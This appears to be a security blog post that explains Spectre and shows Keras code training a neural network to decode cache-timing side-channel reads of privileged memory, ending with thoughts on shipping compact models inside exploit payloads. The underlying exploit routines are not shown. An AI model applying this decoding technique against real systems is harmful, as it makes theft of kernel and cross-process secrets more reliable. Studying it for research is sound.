Google’s Project Zero dropped a bombshell on the security community last week detailing CPU bugs affecting Intel, AMD, and ARM architectures going back as far as the Pentium Pro. Yup, the chip with a mountain of cache and immortalized by Weird Al.

There are actually a few variants of the bugs, collectively named Meltdown and Spectre, detailed in the official bug report. Interestingly, the last line of the bug summary states:

> All PoCs are written against specific processors and will likely require at least some adjustments before they can run in other environments, e.g. because of hardcoded timing tresholds [sic].

Indeed, hardcoding values is never a good idea, as it often leads to inflexible code. This post explores how we might learn these thresholds with the help of deep learning. But first, let’s review how Spectre works.

Spectre, or how to take advantage of CPU optimizations

If you’re looking for the full explanation of this clever exploit, you can find the paper here. In summary, Spectre takes advantage of two very popular CPU optimizations: branch prediction and speculative execution. When a CPU executes a bit of code that includes a branch depending on a value in memory, retrieving that value from RAM may take some time, so the CPU may elect to speculatively execute past the branch. In higher level programming languages, branches are usually the result of conditional statements such as `if … then …`. When the value finally arrives from RAM, the CPU throws away the speculatively executed work if its prediction happened to be wrong.

This speculative execution has the side effect of copying the RAM the CPU reads into cache, and if that memory belongs to another process or, worse, the kernel, it will be cached before modern security mechanisms realize the memory access is forbidden. Thus, malicious code can trick the CPU into caching privileged memory and then read out the cached value via a side channel timing attack. This sort of attack exploits the difference in how long a CPU takes to fetch values from RAM (slow) versus on-die CPU cache (fast). As the bug summary mentions, every CPU will exhibit different timing behavior. This is where deep learning comes in.

Deep Learning CPU Cache Timings

To read the byte value of a privileged memory address, our proof of concept code attempts to read every possible 8 bit value at a given memory address, all 256 of them. We can’t directly read the value because the kernel won’t let us, but we can observe how long each read took. If a read is quick, chances are we hit the right value. Unfortunately, this isn’t always true: some values are always a bit faster to read (for example, 0 and 1), so assuming the fastest read is correct can lead to misread values. Let’s see how we can use a deep learning model to improve read accuracy.

The full proof of concept code can be found here, and I’ll include only the most relevant bits from here on. To get started, we’ll build our training data using a string of possible byte values and their observed cache timings:

```python
data_x = np.zeros([n_samples, 256])
data_y = np.zeros([n_samples, len(unique_chars)])
for i in range(n_iterations):
    for j, val in enumerate(secret_chars):
        data_x[i * n_chars + j, :] = deep_spectre.train(j)
        data_y[i * n_chars + j, char_to_idx_map[val]] = 1
```

`data_x` contains our training data and `data_y` contains our target data. Each row of `data_x` represents an observation of all 256 cache read timings for a single byte value. Each row of `data_y` contains the byte value, one hot encoded.
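The snippet above leans on a handful of helpers (`secret_chars`, `unique_chars`, `char_to_idx_map`, `n_samples`, and friends) that come from the full PoC. As a rough, hypothetical sketch of how they might be set up (the training string, the iteration count, and the exact values are assumptions for illustration, not the PoC’s actual code), it could look like this:

```python
import numpy as np

# Hypothetical setup for the helpers used above; the real PoC may differ.
train_string = ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz"
                "0123456789 .")                      # 64 distinct characters we control
secret_chars = [ord(c) for c in train_string]        # known byte values, one per position
unique_chars = sorted(set(secret_chars))             # distinct byte values -> output classes

# Map each byte value to a class index for one hot encoding, and back again for decoding.
char_to_idx_map = {c: i for i, c in enumerate(unique_chars)}
idx_to_char_map = {i: c for c, i in char_to_idx_map.items()}

n_chars = len(secret_chars)          # bytes timed per pass over the training string
n_iterations = 1000                  # passes over the training string
n_samples = n_iterations * n_chars   # one row of 256 timings per (pass, byte) pair
```

With these made-up numbers, `n_samples` works out to 64,000 rows, which happens to line up with the 48,000/16,000 train/validation split shown later, but the real PoC may use different values.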
Neural networks are typically sensitive to large input values, so we’ll normalize the timings (0 mean, unit variance) using Scikit Learn’s handy scaler. We’ll also split the training and target data into training and validation sets. The validation set contains data the model never sees while training and provides a reasonable metric of how well the model will perform in the wild:

```python
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split

scaler = StandardScaler()
data_x = scaler.fit_transform(data_x)
x_train, x_test, y_train, y_test = train_test_split(data_x, data_y)
```

Now for the exciting part: let’s build a simple deep model. We’ll use the Keras API to wrap TensorFlow and build a four layer densely connected neural network. If you’re curious about neural architecture, I’d encourage you to check out the other layer types Keras has to offer.

```python
from keras.models import Sequential
from keras.layers import Dense

model = Sequential()
model.add(Dense(200, input_shape=(256,), activation='relu'))
model.add(Dense(150, activation='relu'))
model.add(Dense(100, activation='relu'))
model.add(Dense(len(unique_chars), activation='softmax'))

model.compile(loss='categorical_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])

model.fit(x_train, y_train,
          batch_size=32,
          epochs=10,
          validation_data=(x_test, y_test))
```

The call to `model.fit()` will start the training process. If all goes well, our model should achieve above 90% accuracy. Running this on my machine yields:

```
Train on 48000 samples, validate on 16000 samples
Epoch 1/10
48000/48000 [==============================] - 4s 83us/step - loss: 2.9168 - acc: 0.3363 - val_loss: 0.7985 - val_acc: 0.8276
Epoch 2/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.4543 - acc: 0.9007 - val_loss: 0.3505 - val_acc: 0.9204
Epoch 3/10
48000/48000 [==============================] - 4s 75us/step - loss: 0.2802 - acc: 0.9367 - val_loss: 0.2825 - val_acc: 0.9335
Epoch 4/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2516 - acc: 0.9441 - val_loss: 0.2948 - val_acc: 0.9293
Epoch 5/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2368 - acc: 0.9451 - val_loss: 0.2640 - val_acc: 0.9361
Epoch 6/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2320 - acc: 0.9460 - val_loss: 0.2765 - val_acc: 0.9360
Epoch 7/10
48000/48000 [==============================] - 3s 73us/step - loss: 0.2405 - acc: 0.9458 - val_loss: 0.2588 - val_acc: 0.9376
Epoch 8/10
48000/48000 [==============================] - 4s 74us/step - loss: 0.2324 - acc: 0.9468 - val_loss: 0.2502 - val_acc: 0.9403
Epoch 9/10
48000/48000 [==============================] - 4s 73us/step - loss: 0.2269 - acc: 0.9474 - val_loss: 0.2452 - val_acc: 0.9408
Epoch 10/10
48000/48000 [==============================] - 3s 72us/step - loss: 0.2277 - acc: 0.9467 - val_loss: 0.2663 - val_acc: 0.9392
```

Now that we have a trained model, we can use it to predict unknown byte values given only cache timings. For example, let’s read a 40 byte secret string:

```python
secret_len = 40
x_message = np.zeros([secret_len, 256])
for i in range(secret_len):
    x_message[i, :] = deep_spectre.read(i)
```

After passing `x_message` to `model.predict()`, we simply take the output neuron with the highest probability via `np.argmax()` and map it back to a byte value:

```python
y_pred = model.predict(scaler.transform(x_message))
pred_chars = np.argmax(y_pred, axis=1)
message = ''.join(list(map(lambda x: chr(idx_to_char_map[x]), pred_chars)))
print("The secret message is:", message)
```

If everything went according to plan, we should see:

```
The secret message is: The Magic Words are Squeamish Ossifrage.
```

Packaging these deep learning frameworks with an exploit would make for a prohibitively large payload. However, it may be possible to employ TensorFlow Lite to reduce the size of the model.
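To get a feel for what that might look like, here is a minimal sketch of shrinking the trained model with the TensorFlow Lite converter. This assumes the TensorFlow 2.x `tf.lite.TFLiteConverter` API and a model built with (or compatible with) `tf.keras`; it only shows the conversion step, not how the converted model would be invoked from exploit code.

```python
import tensorflow as tf

# Sketch: convert the trained Keras model to a compact TensorFlow Lite flatbuffer.
# Assumes `model` is the trained network from above and is a tf.keras model.
converter = tf.lite.TFLiteConverter.from_keras_model(model)
converter.optimizations = [tf.lite.Optimize.DEFAULT]  # enable post-training quantization
tflite_model = converter.convert()

with open('spectre_timings.tflite', 'wb') as f:
    f.write(tflite_model)

print('TFLite model size: %.1f KB' % (len(tflite_model) / 1024))
```

The network above has only around 100k parameters, so the resulting flatbuffer should land somewhere in the hundreds of kilobytes as float32, and well under that with quantization, which is far smaller than shipping an entire deep learning framework.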
It’s certainly not difficult to imagine a new breed of neural exploits armed with deep learning models to overcome idiosyncrasies found across CPU architectures and software versions.

Of course, this remains purely speculative ;)